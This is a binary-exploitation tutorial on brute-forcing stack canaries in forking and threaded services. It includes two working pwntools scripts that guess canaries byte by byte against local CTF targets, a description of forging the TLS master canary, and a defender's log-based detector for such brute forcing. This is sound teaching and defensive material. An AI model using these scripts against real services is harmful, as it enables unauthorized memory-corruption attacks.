BF Forked & Threaded Stack Canaries



If you are facing a binary protected by a canary and PIE (Position Independent Executable), you probably need to find a way to bypass them.

Note that checksec may not detect that a binary is protected by a canary if it was statically compiled and checksec cannot identify the function. However, you can spot this manually if you notice that a value is saved on the stack at the beginning of a function call and that the same value is checked before the function returns.

Brute-forcing the canary

The best case for bypassing a simple canary is when the binary is a program that forks a child process every time you establish a new connection with it (a network service), because every time you connect the same canary will be used.

Therefore, the best way to bypass the canary is to brute-force it one byte at a time; you can tell whether the guessed canary byte was correct by checking whether the program crashed or continued its normal flow. In this example the function brute-forces an 8-byte canary (x64) and distinguishes a correctly guessed byte from a wrong one simply by checking whether a response is sent back by the server (another way, in other situations, could be a try/except):

Example 1

This example is implemented for 64 bits but could easily be adapted to 32 bits.

from pwn import *

def connect():
    r = remote("localhost", 8788)
    return r

def get_bf(base):
    canary = b""
    guess = 0x0

    while len(canary) < 8:
        while guess <= 0xff:
            r = connect()

            r.recvuntil(b"Username: ")
            r.send(base + bytes([guess]))

            # A reply means the canary check passed, so this byte was right
            if b"SOME OUTPUT" in r.clean():
                print("Guessed correct byte:", format(guess, '02x'))
                canary += bytes([guess])
                base += bytes([guess])
                guess = 0x0
                r.close()
                break
            else:
                guess += 1
                r.close()
        else:
            # No value survived the check: the offset or the success marker is wrong
            raise ValueError("canary byte not found")

    print("FOUND: " + "".join("\\x{:02x}".format(c) for c in canary))
    return base

canary_offset = 1176
base = b"A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base)  # Get junk data + canary
CANARY = u64(base_canary[len(base_canary)-8:])  # Get the canary

Example 2

This is implemented for 32 bits, but it could easily be changed to 64 bits. Also note that for this example the program first expects a byte indicating the size of the input, followed by the payload.

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
    known_canary = b""
    len_bytes_to_read = 0x21

    for j in range(0, 4):
        # Iterate over all 0x100 possible values for this byte
        for test_canary in range(0x100):
            print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

            # Send the current input size
            target.send(len_bytes_to_read.to_bytes(1, "little"))

            # Send this iteration's canary
            target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

            # Scan the output, determine if we have a correct value
            output = target.recvuntil(b"exit.")
            if b"YUM" in output:
                # If we have a correct value, record the canary byte and move on
                print(" - next byte is: " + hex(test_canary))
                known_canary = known_canary + test_canary.to_bytes(1, "little")
                len_bytes_to_read += 1
                break
        else:
            # No value was accepted: the padding length or the success marker is wrong
            raise ValueError("canary byte not found")

    # Return the canary
    return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
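As an added defender's counterpart to the two scripts above (example code written for this edit, not from the original page): every wrong byte guess crashes one forked child, which glibc reports with its "*** stack smashing detected ***" abort, so the brute force leaves a trail of such aborts tied to a single peer. The log format below is constructed and assumed (the parent logs the accepted peer and the child pid, the child's abort line carries its pid); the script correlates the two and flags peers whose children abort repeatedly inside a time window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log excerpt (not from a real host). The service forks one child
# per connection; the parent logs the peer and child pid, and glibc prints the
# "*** stack smashing detected ***" line when a child's canary check fails.
SAMPLE_LOG = """\
2024-05-01T10:00:00 app[1200]: accepted 203.0.113.7:51000 in child 1201
2024-05-01T10:00:00 app[1201]: *** stack smashing detected ***: terminated
2024-05-01T10:00:01 app[1200]: accepted 198.51.100.4:40010 in child 1202
2024-05-01T10:00:01 app[1200]: accepted 203.0.113.7:51001 in child 1203
2024-05-01T10:00:01 app[1203]: *** stack smashing detected ***: terminated
2024-05-01T10:00:02 app[1200]: accepted 203.0.113.7:51002 in child 1204
2024-05-01T10:00:02 app[1204]: *** stack smashing detected ***: terminated
2024-05-01T10:00:03 app[1200]: accepted 203.0.113.7:51003 in child 1205
"""

# Assumed line layouts for the parent's accept message and glibc's abort message
ACCEPT_RE = re.compile(r"^(\S+) app\[(\d+)\]: accepted (\S+):\d+ in child (\d+)$")
ABORT_RE = re.compile(r"^(\S+) app\[(\d+)\]: \*\*\* stack smashing detected \*\*\*")

def find_canary_bruteforce(log_text, threshold=3, window=timedelta(minutes=1)):
    """Return {peer_ip: abort_count} for peers whose forked children failed the
    canary check at least `threshold` times within `window`."""
    child_peer = {}               # child pid -> peer ip that the child serves
    aborts = defaultdict(deque)   # peer ip -> timestamps of canary aborts
    flagged = {}
    for line in log_text.splitlines():
        m = ACCEPT_RE.match(line)
        if m:
            child_peer[m.group(4)] = m.group(3)
            continue
        m = ABORT_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        peer = child_peer.get(m.group(2), "unknown")
        q = aborts[peer]
        q.append(ts)
        while q and ts - q[0] > window:   # drop aborts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[peer] = max(flagged.get(peer, 0), len(q))
    return flagged
```

A real brute force of an 8-byte canary needs up to about 2000 connections and, on average, well over a thousand aborts, so even a low threshold separates it from an occasional crash.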

Threads

Threads of the same process also share the same canary token, so it will be possible to brute-force the canary if the binary spawns a new thread every time an attack happens.

Moreover, a buffer overflow in a threaded function protected with a canary could be used to modify the master canary stored in the TLS. This is because it might be possible to reach the memory location where the TLS is stored (and therefore the canary) via a bof on the thread's stack. As a result, the mitigation is useless because the check compares two canaries that are the same (although modified). This attack is performed in the writeup: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads

Also check the presentation at https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015, which mentions that the TLS is usually stored via mmap and that, when a thread's stack is created, it is also generated by mmap; according to this, that layout might allow the overflow shown in the previous writeup.

Other examples and references
